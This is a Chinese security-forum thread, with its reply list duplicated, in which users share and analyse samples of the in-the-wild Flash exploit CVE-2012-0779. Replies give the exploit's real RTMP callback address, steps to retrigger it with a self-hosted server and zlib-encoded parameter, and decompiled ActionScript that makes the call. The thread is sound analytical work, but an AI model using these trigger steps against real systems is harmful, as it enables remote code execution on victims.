[讨论]分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[讨论]分析

发表于: 2012-5-5 17:05 16622

[讨论]分析

仙果

2012-5-5 17:05

16622

#######

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・1

免费・0

支持

最新回复 (22)
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 2 楼正等呢。。。求样本。。。资料链接一个 http://www.symantec.com/connect/blogs/targeted-attacks-using-confusion-cve-2012-0779 2012-5-5 19:47 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼能给DOC的样本也可以撒。 2012-5-6 22:31 0
dEARMoON 雪币： 106 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 95 粉丝 0 关注私信	dEARMoON 4 楼唉到处都是求样本的 2012-5-7 10:39 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 5 楼样本附加上去了。。真快，真有样本了 2012-5-7 11:50 0
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 6 楼附件中密码是什么 2012-5-7 12:25 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 7 楼求第二个附件的样本密码 2012-5-7 12:37 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 8 楼 Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012. 2012-5-7 12:49 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 9 楼我也在找，搭车同求 2012-5-7 13:06 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 10 楼第一个样本只是看见了堆喷射且有shellcode但最终没触发。。 2012-5-7 13:54 0
lclee 雪币： 240 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 27 粉丝 0 关注私信	lclee 11 楼 sample without password 上传的附件： CVE-2012-0779.zip （67.27kb，120次下载） 2012-5-7 14:24 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 12 楼悲催换了好几个版本的flash了不触发 2012-5-7 14:28 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 13 楼不触发的原因应该是你连不上 rtmp://126.19.84.7:8080/RPCCheckPassword 2012-5-7 14:44 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 14 楼那怎么弄啊能否简单教下 2012-5-7 14:49 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 15 楼怕误导你，不敢乱说 exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000 他原来的info是126.19.84.7:8080 自己搭建一个rmtp://，然后info=zlib(你自己的地址) infosize那个是原DOC一个标记的地址可以不用管 2012-5-7 14:56 0
lionben 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	lionben 16 楼这个flash文件用doswf加了密的..... 2012-5-7 15:08 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 17 楼 exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000 这串是什么啊没明白大牛的这番话。那个IP地址又是从哪来的呢 2012-5-7 15:11 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 18 楼 doc获取的URL. SWF里调用那个参数 var _local1:Object = root.loaderInfo.parameters; var _local2:String = _local1["info"]; var _local3:ByteArray = hexToBin(_local2); var _local4:uint; _local4 = 0; while (_local4 < _local3.length) { _local3[_local4] = (_local3[_local4] ^ 0); _local4++; }; _local3.uncompress(); var _local5:String = String(_local3); _fun1(_local5); // _fun1 (_arg1:String) this._local1 = new NetConnection(); var _local2 = "rtmp://"; var _local3 = "/RPCCheckPassword"; var _local4:String = ((_local2 + _arg1) + _local3); this._local1.connect(_local4); this._local1.call("systemMemoryCall", this._local5, "argc"); 2012-5-7 15:36 0
老纳雪币： 105 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 77 粉丝 0 关注私信	老纳 19 楼膜拜，楼上已经解出来了。 2012-5-7 15:43 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 20 楼膜拜大东 2012-5-7 15:49 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 21 楼膜拜啊。。真厉害 2012-5-7 15:53 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 22 楼 [QUOTE=大东;1070305]doc获取的URL. SWF里调用那个参数 var _local1:Object = root.loaderInfo.parameters; var _local2:String = _local1["info"]; var _loc...[/QUOTE] dadong 隐藏的高手啊 2012-5-7 15:53 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 23 楼请教是如何解密的？ 2012-5-7 15:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (22)
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 2 楼正等呢。。。求样本。。。资料链接一个 http://www.symantec.com/connect/blogs/targeted-attacks-using-confusion-cve-2012-0779 2012-5-5 19:47 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼能给DOC的样本也可以撒。 2012-5-6 22:31 0
dEARMoON 雪币： 106 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 95 粉丝 0 关注私信	dEARMoON 4 楼唉到处都是求样本的 2012-5-7 10:39 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 5 楼样本附加上去了。。真快，真有样本了 2012-5-7 11:50 0
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 6 楼附件中密码是什么 2012-5-7 12:25 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 7 楼求第二个附件的样本密码 2012-5-7 12:37 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 8 楼 Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012. 2012-5-7 12:49 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 9 楼我也在找，搭车同求 2012-5-7 13:06 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 10 楼第一个样本只是看见了堆喷射且有shellcode但最终没触发。。 2012-5-7 13:54 0
lclee 雪币： 240 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 27 粉丝 0 关注私信	lclee 11 楼 sample without password 上传的附件： CVE-2012-0779.zip （67.27kb，120次下载） 2012-5-7 14:24 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 12 楼悲催换了好几个版本的flash了不触发 2012-5-7 14:28 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 13 楼不触发的原因应该是你连不上 rtmp://126.19.84.7:8080/RPCCheckPassword 2012-5-7 14:44 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 14 楼那怎么弄啊能否简单教下 2012-5-7 14:49 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 15 楼怕误导你，不敢乱说 exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000 他原来的info是126.19.84.7:8080 自己搭建一个rmtp://，然后info=zlib(你自己的地址) infosize那个是原DOC一个标记的地址可以不用管 2012-5-7 14:56 0
lionben 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	lionben 16 楼这个flash文件用doswf加了密的..... 2012-5-7 15:08 0
清新阳光雪币： 95 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 59 粉丝 0 关注私信	清新阳光 17 楼 exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000 这串是什么啊没明白大牛的这番话。那个IP地址又是从哪来的呢 2012-5-7 15:11 0
大东雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	大东 18 楼 doc获取的URL. SWF里调用那个参数 var _local1:Object = root.loaderInfo.parameters; var _local2:String = _local1["info"]; var _local3:ByteArray = hexToBin(_local2); var _local4:uint; _local4 = 0; while (_local4 < _local3.length) { _local3[_local4] = (_local3[_local4] ^ 0); _local4++; }; _local3.uncompress(); var _local5:String = String(_local3); _fun1(_local5); // _fun1 (_arg1:String) this._local1 = new NetConnection(); var _local2 = "rtmp://"; var _local3 = "/RPCCheckPassword"; var _local4:String = ((_local2 + _arg1) + _local3); this._local1.connect(_local4); this._local1.call("systemMemoryCall", this._local5, "argc"); 2012-5-7 15:36 0
老纳雪币： 105 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 77 粉丝 0 关注私信	老纳 19 楼膜拜，楼上已经解出来了。 2012-5-7 15:43 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 20 楼膜拜大东 2012-5-7 15:49 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 21 楼膜拜啊。。真厉害 2012-5-7 15:53 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 22 楼 [QUOTE=大东;1070305]doc获取的URL. SWF里调用那个参数 var _local1:Object = root.loaderInfo.parameters; var _local2:String = _local1["info"]; var _loc...[/QUOTE] dadong 隐藏的高手啊 2012-5-7 15:53 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 23 楼请教是如何解密的？ 2012-5-7 15:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复